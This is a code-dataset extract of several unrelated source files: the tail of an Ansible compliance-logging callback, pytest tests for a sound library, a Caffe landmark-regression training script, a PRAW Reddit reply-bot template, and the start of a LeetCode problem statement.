{0}\".format(remote_node.hostname))\n print(\"IPV4: {0}\".format(remote_node.ipv4))\n\n # MACHINE\n sql_select_query_for_machine_id = 'INSERT INTO machine(os_id, hostname, ipv4) VALUES (%s, %s, %s) ON CONFLICT (os_id, hostname, ipv4) DO UPDATE SET hostname = EXCLUDED.hostname RETURNING id'\n cursor.execute(sql_select_query_for_machine_id, (os_id, remote_node.hostname, remote_node.ipv4,))\n machine_id = cursor.fetchone()[0]\n print(\"Machine ID:::: {0}\".format(machine_id))\n\n #RUN_HISTORY\n sql_insert_query_for_machine_run_history = 'INSERT INTO machine_run_history (history_id, machine_id) VALUES (%s, %s)'\n cursor.execute(sql_insert_query_for_machine_run_history, (history_id, machine_id,))\n\n for ruleNode in ruleNodes: \n taskNodes = ruleNode.task_node\n status = ruleNode.status\n parent_id = 0\n\n for section in sorted(taskNodes.keys()):\n rule = taskNodes[section] \n\n # RULES\n sql_select_query_for_rule_id = 'INSERT INTO compliance_rule(playbook_id, parent_id, rule, is_scored, level, expcted_value, profile1, profile2, section) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s) ON CONFLICT (playbook_id, rule, section) DO UPDATE SET rule = EXCLUDED.rule RETURNING id' \n cursor.execute(sql_select_query_for_rule_id, (playbook_id, parent_id, rule.rule, rule.scored, rule.level, \"NA\", rule.profile1, rule.profile2, section,))\n rule_id = cursor.fetchone()[0]\n\n if parent_id == 0:\n sql_update_query_for_compliance_rule = 'UPDATE compliance_rule SET parent_id=%s WHERE id=%s'\n cursor.execute(sql_update_query_for_compliance_rule, (rule_id, rule_id,))\n\n if rule.level != 0:\n parent_id = rule_id\n\n is_compliant = 'Compliant' if status in [\"OK\", \"CHANGED\", \"SKIPPED\"] else 'Non-Compliant'\n # MACHINE COMPLIANCE RULE\n print(\"historyID: {0}, ruleID: {1}, status: {2}\".format(history_id, rule_id, status))\n sql_insert_query_for_run_machine_compliance_rule = 'INSERT INTO machine_compliance_rule (history_id, compliance_rule_id, status, is_compliant) VALUES (%s, %s, %s, %s) RETURNING id'\n cursor.execute(sql_insert_query_for_run_machine_compliance_rule, (history_id, rule_id, status, is_compliant,))\n \n connection.commit()\n connection.close()\n","sub_path":"RHEL8/callback_plugins/callbackScripts.py","file_name":"callbackScripts.py","file_ext":"py","file_size_in_byte":21567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"436777428","text":"import pytest\n\nimport src.sound.utils as utils\nfrom src.sound import SoundGroup\n\n\nclass TestGetSoundRootDirectory:\n @pytest.fixture\n def example_group(self):\n group_config = {\"name\": \"Group 1\", \"sounds\": [{\"name\": \"Sound 1\", \"files\": [\"sound_1.wav\"]}]}\n return SoundGroup(group_config)\n\n def test_get_sound_root_directory_returns_global_directory(self, example_group):\n \"\"\"\n If a directory is specified at the default level and no other level, return the default directory.\n \"\"\"\n example_group.directory = None\n sound = example_group.sounds[0]\n sound.directory = None\n directory = utils.get_sound_root_directory(group=example_group, sound=sound, default_dir=\"default/dir\")\n assert directory == \"default/dir\"\n\n def test_get_sound_root_directory_returns_group_directory(self, example_group):\n \"\"\"\n When a directory is specified for a SoundGroup and no directory is specified for the Sound, the\n group directory should be returned (not the default directory).\n \"\"\"\n example_group.directory = \"group/dir\"\n sound = example_group.sounds[0]\n sound.directory = None\n directory = utils.get_sound_root_directory(group=example_group, sound=sound, default_dir=\"default/dir\")\n assert directory == \"group/dir\"\n\n def test_get_sound_root_directory_returns_sound_directory(self, example_group):\n \"\"\"\n When a directory is specified for a Sound, it should be returned (not the default or group directory).\n \"\"\"\n example_group.directory = \"group/dir\"\n sound = example_group.sounds[0]\n sound.directory = \"sound/dir\"\n directory = utils.get_sound_root_directory(group=example_group, sound=sound, default_dir=\"default/dir\")\n assert directory == \"sound/dir\"\n\n def test_get_sound_root_directory_raises_value_error_if_no_directory_on_any_level(self, example_group):\n \"\"\"\n If no directory is specified at all (neither the default, group or sound level), then raise a ValueError.\n \"\"\"\n example_group.directory = None\n sound = example_group.sounds[0]\n sound.directory = None\n with pytest.raises(ValueError):\n utils.get_sound_root_directory(group=example_group, sound=sound, default_dir=None)\n\n\nclass TestSoundTupleGenerator:\n def test_sound_tuple_generator(self):\n \"\"\"\n Test that calling `sound_tuple_generator()` returns an iterator over all tuples of the form\n (group, sound, sound_file).\n \"\"\"\n group_config = {\n \"name\": \"Group 1\",\n \"sounds\": [\n {\"name\": \"Sound 1\", \"files\": [\"sound_file_1.wav\"]},\n {\"name\": \"Sound 2\", \"files\": [\"sound_file_2.wav\", \"sound_file_3.wav\"]},\n ],\n }\n groups = [SoundGroup(group_config)]\n generator = utils.sound_tuple_generator(groups)\n first_tuple = (groups[0], groups[0].sounds[0], groups[0].sounds[0].files[0])\n second_tuple = (groups[0], groups[0].sounds[1], groups[0].sounds[1].files[0])\n third_tuple = (groups[0], groups[0].sounds[1], groups[0].sounds[1].files[1])\n assert first_tuple == next(generator)\n assert second_tuple == next(generator)\n assert third_tuple == next(generator)\n with pytest.raises(StopIteration):\n next(generator)\n","sub_path":"tests/test_sound/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"374803106","text":"caffe_root = '../caffe/' # this file should be run from {caffe_root}/examples (otherwise change this line)\r\nimport cv2\r\nimport sys\r\nsys.path.insert(0, caffe_root + 'python')\r\nimport caffe\r\nimport math\r\nimport getopt\r\ncaffe.set_device(0)\r\ncaffe.set_mode_gpu()\r\n\r\nimport os\r\nimport numpy as np\r\nfrom pylab import *\r\nimport tempfile\r\nfrom caffe.proto import caffe_pb2\r\nfrom caffe import layers as L, params as P\r\n\r\ndef run_solvers(niter, solvers):\r\n \"\"\"Run solvers for niter iterations,\r\n returning the loss and accuracy recorded each iteration.\r\n `solvers` is a solver\"\"\"\r\n \r\n loss = np.zeros(niter) \r\n \r\n s=solvers\r\n for it in range(niter):\r\n s.step(1) # run a single SGD step in Caffe\r\n loss[it]= s.net.blobs['loss'].data.copy()\r\n \r\n # weight_dir = tempfile.mkdtemp()\r\n filename = 'weights.caffemodel' \r\n weights= os.path.join(filename)\r\n s.net.save(weights)\r\n return loss, weights\r\ndef solver(train_net_path,test_net_path=None, base_lr=0.001):\r\n s = caffe_pb2.SolverParameter()\r\n\r\n # Specify locations of the train and (maybe) test networks.\r\n s.train_net =train_net_path\r\n if test_net_path is not None:\r\n s.test_net.append(test_net_path)\r\n s.test_interval = 1000 # Test after every 1000 training iterations.\r\n s.test_iter.append(100) # Test on 100 batches each time we test.\r\n\r\n # The number of iterations over which to average the gradient.\r\n # Effectively boosts the training batch size by the given factor, without\r\n # affecting memory utilization.\r\n s.iter_size = 1\r\n \r\n s.max_iter = 100000 # # of times to update the net (training iterations)\r\n \r\n # Solve using the stochastic gradient descent (SGD) algorithm.\r\n # Other choices include 'Adam' and 'RMSProp'.\r\n s.type = 'SGD'\r\n\r\n # Set the initial learning rate for SGD.\r\n s.base_lr = base_lr\r\n\r\n # Set `lr_policy` to define how the learning rate changes during training.\r\n # Here, we 'step' the learning rate by multiplying it by a factor `gamma`\r\n # every `stepsize` iterations.\r\n s.lr_policy = 'step'\r\n s.gamma = 0.1\r\n s.stepsize = 5000\r\n\r\n # Set other SGD hyperparameters. Setting a non-zero `momentum` takes a\r\n # weighted average of the current gradient and previous gradients to make\r\n # learning more stable. L2 weight decay regularizes learning, to help prevent\r\n # the model from overfitting.\r\n s.momentum = 0.9\r\n s.weight_decay = 5e-4\r\n\r\n # Display the current training loss and accuracy every 1000 iterations.\r\n s.display = 100\r\n\r\n # Snapshots are files used to store networks we've trained. Here, we'll\r\n # snapshot every 10K iterations -- ten times during training.\r\n s.snapshot = 10000\r\n s.snapshot_prefix = 'test_snapshot'\r\n \r\n # Train on the GPU. Using the CPU to train large networks is very slow.\r\n s.solver_mode = caffe_pb2.SolverParameter.GPU\r\n \r\n return s\r\ndef anno_net(train,batch_size=128,data=None):\r\n \r\n n = caffe.NetSpec()\r\n \r\n if train:\r\n n.data, n.label = L.HDF5Data(source='train_h5_list.txt', batch_size=batch_size, ntop=2) \r\n else:\r\n n.data = data\r\n \r\n \r\n n.conv1_1 = L.Convolution(n.data, kernel_size=3,pad=1,num_output=32,\\\r\n param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n n.relu1_1 = L.ReLU(n.conv1_1, in_place=True)\r\n\r\n n.conv1_2 = L.Convolution(n.conv1_1, kernel_size=3,pad=1,num_output=32,\\\r\n param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n n.relu1_2 = L.ReLU(n.conv1_2, in_place=True)\r\n\r\n n.pool1 = L.Pooling(n.relu1_2, kernel_size=2,stride=2, pool=P.Pooling.MAX)\r\n # n.dropout1 = L.Dropout(n.pool1, in_place=True,dropout_ratio = 0.1)\r\n\r\n n.conv2_1 = L.Convolution(n.pool1, kernel_size=3,pad=1,num_output=64,\\\r\n param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n n.relu2_1 = L.ReLU(n.conv2_1, in_place=True)\r\n\r\n n.pool2 = L.Pooling(n.relu2_1, kernel_size=2, stride=2, pool=P.Pooling.AVE)\r\n # n.dropout2 = L.Dropout(n.pool2, in_place=True,dropout_ratio = 0.2)\r\n\r\n n.conv3_1 = L.Convolution(n.pool2, kernel_size=3,pad=1,num_output=128,\\\r\n param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n n.relu3_1 = L.ReLU(n.conv3_1,in_place=True)\r\n\r\n n.pool3 = L.Pooling(n.relu3_1, kernel_size=2, stride=2, pool=P.Pooling.AVE)\r\n # n.dropout3 = L.Dropout(n.pool3, in_place=True,dropout_ratio = 0.3)\r\n \r\n n.Flat=L.Flatten(n.pool3)\r\n\r\n n.fc6= L.InnerProduct(n.Flat, num_output=1024, \\\r\n param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n weight_filler=dict(type='xavier',std=0.05),bias_filler=dict(type='constant'))\r\n n.relu6 = L.ReLU(n.fc6, in_place=True)\r\n n.dropout4 = L.Dropout(n.relu6, in_place=True,dropout_ratio = 0.3)\r\n \r\n n.fc7= L.InnerProduct(n.dropout4, num_output=1024, \\\r\n param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n weight_filler=dict(type='xavier',std=0.05),bias_filler=dict(type='constant'))\r\n n.relu7 = L.ReLU(n.fc7, in_place=True)\r\n \r\n n.fc8= L.InnerProduct(n.fc7, num_output=110, \\\r\n param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n weight_filler=dict(type='xavier',std=0.05),bias_filler=dict(type='constant'))\r\n\r\n # n.conv1_1 = L.Convolution(n.data, kernel_size=3,pad=1,num_output=64,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu1_1 = L.ReLU(n.conv1_1, in_place=True)\r\n\r\n # n.conv1_2 = L.Convolution(n.relu1_1, kernel_size=3,pad=1,num_output=64,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu1_2 = L.ReLU(n.conv1_2, in_place=True)\r\n\r\n # n.pool1 = L.Pooling(n.relu1_2, kernel_size=2,stride=2, pool=P.Pooling.MAX)\r\n\r\n # n.conv2_1 = L.Convolution(n.pool1, kernel_size=3,pad=1,num_output=128,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu2_1 = L.ReLU(n.conv2_1, in_place=True)\r\n\r\n # n.conv2_2 = L.Convolution(n.conv2_1, kernel_size=3,pad=1,num_output=128,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu2_2 = L.ReLU(n.conv2_2, in_place=True)\r\n\r\n # n.pool2 = L.Pooling(n.relu2_2, kernel_size=2, stride=2, pool=P.Pooling.AVE)\r\n\r\n # n.conv3_1 = L.Convolution(n.pool2, kernel_size=3,pad=1,num_output=256,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu3_1 = L.ReLU(n.conv3_1,in_place=True)\r\n\r\n # n.conv3_2 = L.Convolution(n.conv3_1, kernel_size=3,pad=1,num_output=256,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu3_2 = L.ReLU(n.conv3_2, in_place=True)\r\n\r\n # n.conv3_3 = L.Convolution(n.relu3_2, kernel_size=3,pad=1,num_output=256,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu3_3 = L.ReLU(n.conv3_3, in_place=True)\r\n\r\n # n.pool3 = L.Pooling(n.relu3_3, kernel_size=2, stride=2, pool=P.Pooling.AVE)\r\n\r\n # n.conv4_1 = L.Convolution(n.pool3, kernel_size=3,pad=1,num_output=512,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu4_1 = L.ReLU(n.conv4_1, in_place=True)\r\n\r\n # n.conv4_2 = L.Convolution(n.relu4_1, kernel_size=3,pad=1,num_output=512,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu4_2 = L.ReLU(n.conv4_2, in_place=True)\r\n\r\n # n.conv4_3 = L.Convolution(n.relu4_2, kernel_size=3,pad=1,num_output=512,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu4_3 = L.ReLU(n.conv4_3, in_place=True)\r\n\r\n # n.pool4 = L.Pooling(n.relu4_3, kernel_size=2, stride=2, pool=P.Pooling.AVE)\r\n\r\n # n.conv5_1 = L.Convolution(n.pool4, kernel_size=3,pad=1,num_output=512,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu5_1 = L.ReLU(n.conv5_1, in_place=True)\r\n\r\n # n.conv5_2 = L.Convolution(n.relu5_1, kernel_size=3,pad=1,num_output=512,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu5_2 = L.ReLU(n.conv5_2, in_place=True)\r\n\r\n # n.conv5_3 = L.Convolution(n.relu5_2, kernel_size=3,pad=1,num_output=512,\\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.01),bias_filler=dict(type='constant'))\r\n # n.relu5_3 = L.ReLU(n.conv5_3, in_place=True)\r\n\r\n # n.pool5 = L.Pooling(n.relu5_3, kernel_size=2, stride=2, pool=P.Pooling.AVE)\r\n\r\n # n.fc6= L.Convolution(n.pool5, kernel_size=3, pad=3,dilation=3,num_output=1024, \\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.05),bias_filler=dict(type='constant'))\r\n # n.relu6 = L.ReLU(n.fc6, in_place=True)\r\n # n.dropout6 = L.Dropout(n.relu6, in_place=True)\r\n \r\n # n.fc7= L.Convolution(n.dropout6, kernel_size=3, pad=3,dilation=3,num_output=1024, \\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.05),bias_filler=dict(type='constant'))\r\n # n.relu7 = L.ReLU(n.fc7, in_place=True)\r\n # n.dropout7 = L.Dropout(n.relu7, in_place=True)\r\n \r\n # n.fc8= L.Convolution(n.dropout7, kernel_h=3,kernel_w=3, num_output=110, \\\r\n # param = [dict(lr_mult=1, decay_mult=1), dict(lr_mult=2, decay_mult=0)],\\\r\n # weight_filler=dict(type='xavier',std=0.05),bias_filler=dict(type='constant'))\r\n\r\n\r\n if train:\r\n n.loss =L.EuclideanLoss(n.fc8, n.label)\r\n # n.acc=L.EuclideanLoss(n.fc8, n.label)\r\n return n.to_proto()\r\n\r\n\r\n\r\ndef train(niter=10000):\r\n with open('train.prototxt', 'w') as f:\r\n f.write(str(anno_net(train=True)))\r\n\r\n with open('solver.prototxt', 'w') as f:\r\n f.write(str(solver('train.prototxt')))\r\n\r\n niter=10000\r\n print ('Running solvers for %d iterations...' % niter)\r\n solvers =caffe.get_solver('solver.prototxt') # directly read from the data\r\n loss, weights = run_solvers(niter, solvers)\r\n print ('Done.')\r\n\r\n # Delete solvers to save memory.\r\n del solvers\r\n\r\n #train show\r\n plt.figure()\r\n plot(list(loss[int(i)-1] for i in np.linspace(1,len(loss),len(loss)/100)))\r\n xlabel('Iteration #')\r\n ylabel('Loss')\r\n plt.show()\r\n\r\n return loss, weights\r\n\r\ndef commander_input(argv):\r\n #for input\r\n inputfile=''\r\n mode=''\r\n try:\r\n opts, args = getopt.getopt(argv,\"hi:m:\",[\"ifile=\",\"mode=\"])\r\n except getopt.GetoptError:\r\n print('Lpython anno_test.py -i -m ')\r\n sys.exit(2)\r\n for opt, arg in opts:\r\n if opt == '-h':\r\n print('Lpython anno_test.py -i -m ')\r\n sys.exit()\r\n elif opt in (\"-i\", \"--ifile\"):\r\n inputfile = arg\r\n elif opt in (\"-m\", \"--mode\"):\r\n mode = arg\r\n\r\n if not inputfile or int(inputfile)<1 or int(inputfile)>605:\r\n print('Failure. Input the file_number first!')\r\n sys.exit(2)\r\n else:\r\n inputfile = 'out/'+inputfile+'.png'\r\n \r\n if not mode or mode=='False':\r\n Train_flag=False\r\n print('Mode: Test')\r\n elif mode=='True':\r\n Train_flag=True\r\n print('Mode: Train')\r\n else:\r\n print('Failure. Mode should be \"False\" or \"True\"')\r\n\r\n return Train_flag, inputfile\r\n\r\ndef main(argv):\r\n \r\n Train_flag,inputfile=commander_input(argv)\r\n\r\n if Train_flag:\r\n # train or not\r\n loss, weights=train(10000)\r\n \r\n\r\n # delete the contents\r\n with open('Result.txt', \"r+\") as f:\r\n f.seek(0)\r\n f.truncate() \r\n f.close()\r\n\r\n test_path='crop_test.txt'\r\n with open(test_path, 'r' ) as T :\r\n lines = T.readlines()\r\n \r\n\r\n GOOD=0 # number of the good ones(<0.35)\r\n NUMBER=0 # number of the ones being tested\r\n for i,l in enumerate(lines):\r\n loss_new=0\r\n sp = l.split(' ')\r\n # if sp[0]==imgpath:\r\n \r\n imgpath=sp[0]\r\n img_src = cv2.imread(imgpath)\r\n\r\n img=img_src # copy\r\n \r\n img = img.astype(float)\r\n\r\n h,w,_=img_src.shape #(y,x,channel)\r\n dummy_data = L.DummyData(shape=dict(dim=[1, 3, 96, 96]))\r\n with open('deploy.prototxt', 'w') as f:\r\n f.write(str(anno_net(train=False,data=dummy_data)))\r\n\r\n if not Train_flag:\r\n weights = 'weights.caffemodel'\r\n deploy_net = caffe.Net('deploy.prototxt', weights, caffe.TEST)\r\n \r\n im_data = cv2.resize(img, (96,96))\r\n # mean=np.array([85.19454521, 100.91133012, 130.16421912])\r\n mean=np.array([85.18678326,100.91105471,130.16646401 ])\r\n # mean=np.array([84.3265 101.5739 136.35704451])\r\n im_data-=mean \r\n im_data = im_data*0.00390625 # [0,255] -> [0,1]\r\n im_data=im_data.transpose(2,0,1) #HWC->CHW\r\n im_data = np.array([im_data], dtype = np.float)\r\n deploy_net.blobs['data'].data[...] = im_data\r\n output=deploy_net.forward(start='conv1_1')['fc8']\r\n\r\n # #draw predicted points\r\n label=np.zeros(110)\r\n for j in range(110):\r\n if (j+1)%2: #x\r\n label[j],label[j+1]= output[0,j]*w,output[0,j+1]*h\r\n loss_new+=math.pow((float(sp[j+1])-label[j]),2)\r\n \r\n loss_new=math.sqrt(loss_new)/w\r\n\r\n temp=sp[0]+' '+str(round(loss_new,3))\r\n\r\n if loss_new<=0.35:\r\n temp+=' Good!\\n'\r\n GOOD+=1\r\n else:\r\n temp+='\\n'\r\n NUMBER+=1\r\n with open('Result.txt', 'a+' ) as P :\r\n P.write(temp)\r\n P.close()\r\n \r\n\r\n print('Ratio: %f'%(GOOD/NUMBER)) \r\n\r\n\r\n\r\n\r\n # imgpath=inputfile\r\n # img_src = cv2.imread(imgpath)\r\n\r\n # img=img_src # copy\r\n \r\n # img = img.astype(float)\r\n\r\n # h,w,_=img_src.shape #(y,x,channel)\r\n # dummy_data = L.DummyData(shape=dict(dim=[1, 3, 96, 96]))\r\n # with open('deploy.prototxt', 'w') as f:\r\n # f.write(str(anno_net(train=False,data=dummy_data)))\r\n\r\n # if not Train_flag:\r\n # weights = 'weights.caffemodel'\r\n # deploy_net = caffe.Net('deploy.prototxt', weights, caffe.TEST)\r\n \r\n # im_data = cv2.resize(img, (96,96))\r\n # # mean=np.array([85.19454521, 100.91133012, 130.16421912])\r\n # mean=np.array([85.18678326,100.91105471,130.16646401 ])\r\n # # mean=np.array([84.3265 101.5739 136.35704451])\r\n # im_data-=mean \r\n # im_data = im_data*0.00390625 # [0,255] -> [0,1]\r\n # im_data=im_data.transpose(2,0,1) #HWC->CHW\r\n # im_data = np.array([im_data], dtype = np.float)\r\n # deploy_net.blobs['data'].data[...] = im_data\r\n # output=deploy_net.forward(start='conv1_1')['fc8']\r\n\r\n\r\n # #draw predicted points\r\n # label=np.zeros(110)\r\n # for j in range(110):\r\n # if (j+1)%2: #x\r\n # label[j],label[j+1]= output[0,j]*w,output[0,j+1]*h\r\n # print(label[j],label[j+1])\r\n # cv2.circle(img_src,(int(label[j]),int(label[j+1])),1,(255,0,0),1)\r\n\r\n # print('\\n\\n')\r\n # #draw original ones, for comparison\r\n # test_path='whole.txt'\r\n # with open(test_path, 'r' ) as T :\r\n # lines = T.readlines()\r\n # loss_new=0\r\n # for i,l in enumerate(lines):\r\n # sp = l.split(' ')\r\n # if sp[0]==imgpath:\r\n # for j in range(110):\r\n # loss_new+=math.pow((float(sp[j+1])-label[j]),2)\r\n # if (j+1)%2:\r\n # print(sp[j+1],sp[j+2])\r\n # cv2.circle(img_src,(int(sp[j+1]),int(sp[j+2])),1,(0,0,255),1)\r\n # break\r\n\r\n \r\n # loss_new=math.sqrt(loss_new)/w\r\n # print('\\nLOSS: %f'%loss_new) \r\n\r\n \r\n # cv2.imshow(\"ear2\", img_src) \r\n # ch = cv2.waitKey(0) & 0xFF\r\n # if ch == 27:\r\n # os.exit()\r\nif __name__ == \"__main__\":\r\n main(sys.argv[1:])\r\n","sub_path":"anno_test.py","file_name":"anno_test.py","file_ext":"py","file_size_in_byte":17358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"550605804","text":"import praw # The Reddit API\n# Necessary exceptions to catch\nfrom prawcore.exceptions import OAuthException, ResponseException\n# To truncate messages (optional really)\nfrom wolfinaboxutils.formatting import truncate\nimport time # To sleep\nimport json # Save/Load config\nimport logging # For logging... of course\nimport sys # For various things\n# Configure the logger\nlogger = logging.getLogger('redditbot')\nlogger.addHandler(logging.FileHandler(f'{__name__}.log'))\nlogger.addHandler(logging.StreamHandler(sys.stdout))\nlogger.setLevel(logging.DEBUG)\n\n#GLOBALS===========================#\nconfig = {}\ndefault_config = {'owner': 'owner_username_here', 'username': 'bot_username_here', 'password': 'bot_password_here',\n 'client_id': 'bot_client_id_here', 'client_secret': 'bot_client_secret_here', 'user_agent': 'descriptive bot message here',\n 'subreddits': [], 'unsubscribed_users': []}\n#==================================#\n#Functions=========================#\n\n\ndef save():\n \"\"\"\n Save the config to file\n \"\"\"\n # Open \"config.json\" and dump the config to it\n with open('config.json', 'w') as f:\n json.dump(config, f, indent=4, separators=(',', ': '))\n\n\ndef footer_message(bot: praw.Reddit):\n \"\"\"\n Returns the constructed footer message.\\n\n `bot` The currently running bot.\n \"\"\"\n # This can be customised to whatever you like. You can use Reddit markdown formatting as well.\n return f'\\n\\n___\\n\\n*^I ^am ^a ^bot. ^Message ^u/{config[\"owner\"]} ^if ^I ^am ^being ^stupid. ^[Unsubscribe](https://www.reddit.com/message/compose/?to={str(bot.user.me())}&subject=unsubscribe&message=unsubscribe)*'\n\n\ndef login():\n # Try loading the config and logging in\n try:\n global config\n with open('config.json', 'r') as f:\n config = json.load(f)\n # This block creates the Reddit api connection.\n r = praw.Reddit(username=config['username'], password=config['password'],\n client_id=config['client_id'], client_secret=config['client_secret'],\n user_agent=config['user_agent'])\n\n # Check credentials (if we can get \"me\", we're logged in!)\n r.user.me()\n return r\n # Config file doesn't exist\n except FileNotFoundError:\n logger.warn(\n 'Couldn\\'t find \"config.json\", creating...\\nPlease edit \"config.json\" and fill in the variables with your information.')\n with open('config.json', 'w') as f:\n json.dump(default_config, f, indent=4, separators=(',', ': '))\n # Couldn't log in to Reddit (probably wrong credentials)\n except (OAuthException, ResponseException) as e:\n logger.error(\n 'Invalid credentials.\\nPlease check that the credentials in \"config.json\" are correct.\\n('+str(e)+')')\n input('Press return to exit...')\n exit(0)\n\n\ndef handle_comments(bot: praw.Reddit, max_comments: int = 25):\n \"\"\"\n Handle comments\\n\n `bot` The currently running bot\\n\n `max_comments` How many comments to search through (for each sub)\n \"\"\"\n # For every subreddit bot should comment on\n for subreddit in config['subreddits']:\n # For every comment in that subreddit\n for comment in bot.subreddit(subreddit).comments(limit=max_comments):\n # Don't reply to ourself\n if comment.author == bot.user.me():\n continue\n # Don't reply to unsubscribed users\n if comment.author in config['unsubscribed_users']:\n continue\n # Get Replies (this needs to be done, otherwise replies are not requested)\n comment.refresh()\n # Don't reply to the same post more than once\n if bot.user.me() in [comment.author for comment in comment.replies]:\n continue\n\n # Start Matching Text\n # EXAMPLE: This will match the word 'test' in a comment (.lower() so TEST or tEsT is also matched)\n if 'test' in comment.body.lower():\n logger.info('Found matching comment \"'+comment.id+'\" in subreddit \"' +\n subreddit+'\"\\n\\t\"'+truncate(comment.body, 70, '...')+'\"')\n # This is how you reply\n comment.reply(f'I found this comment!{footer_message(bot)}')\n\n\ndef handle_messages(bot: praw.Reddit, max_messages: int = 25):\n \"\"\"\n Handle messages to the bot\\n\n `bot` The currently running bot\n `max_messages` How many messages to search through\n \"\"\"\n # Get the messages\n messages = list(bot.inbox.messages(limit=max_messages))\n # If we have no messages, quit\n if len(messages) == 0:\n return\n # Print how many messages we have\n logger.info('Messages ('+str(len(messages))+'):')\n # Iterate through every message\n for message in messages:\n logger.info('Sender: '+(str(message.author)\n if message.author else 'Reddit'))\n logger.info('\\t\"'+truncate(message.body, 70, '...')+'\"')\n\n # This is where you can handle different text in the messages.\n # Unsubscribe user\n if 'unsubscribe' in message.subject.lower() or 'unsubscribe' in message.body.lower():\n logger.info(f'Unsubscribing \"{message.author}\"')\n config['unsubscribed_users'].append(str(message.author))\n save()\n message.reply(\n f'Okay, I will no longer reply to your posts.{footer_message(bot)}')\n message.delete()\n # Ignore the message if we don't recognise it\n else:\n message.delete()\n\n\ndef run_bot(bot: praw.Reddit, sleep_time: int = 10):\n handle_comments(bot)\n handle_messages(bot)\n # Sleep, to not flood\n logger.debug('Sleeping '+str(sleep_time)+' seconds...')\n time.sleep(sleep_time)\n#==================================#\n\n\n#Main Code=========================#\nif __name__ == '__main__':\n logger.info('Logging in...')\n bot = login()\n\n logger.info('Logged in as '+str(bot.user.me()))\n logger.info('Active in '+str(len(config['subreddits']))+' subreddit'+('s'if len(config['subreddits']) != 1 else '')+': ' +\n (', '.join([sub for sub in config['subreddits']])))\n logger.info(str(len(config['unsubscribed_users']))+' unsubscribed user' +\n ('s'if len(config['unsubscribed_users']) != 1 else ''))\n\n while True:\n run_bot(bot)\n#==================================#\n","sub_path":"prawbot.py","file_name":"prawbot.py","file_ext":"py","file_size_in_byte":6431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"259276619","text":"\"\"\"\n1163. Last Substring in Lexicographical Order\nGiven a string s, return the last substring of s in lexicographical order.\n\n \n\nExample 1:\n\nInput: \"abab\"\nOutput: \"bab\"\nExplanation: The substrings are [\"a\", \"ab\", \"aba\", \"abab\", \"b\", \"ba\", \"bab\"]. The lexicographically maximum substring is \"bab\".\nExample 2:\n\nInput: \"leetcode\"\nOutput: 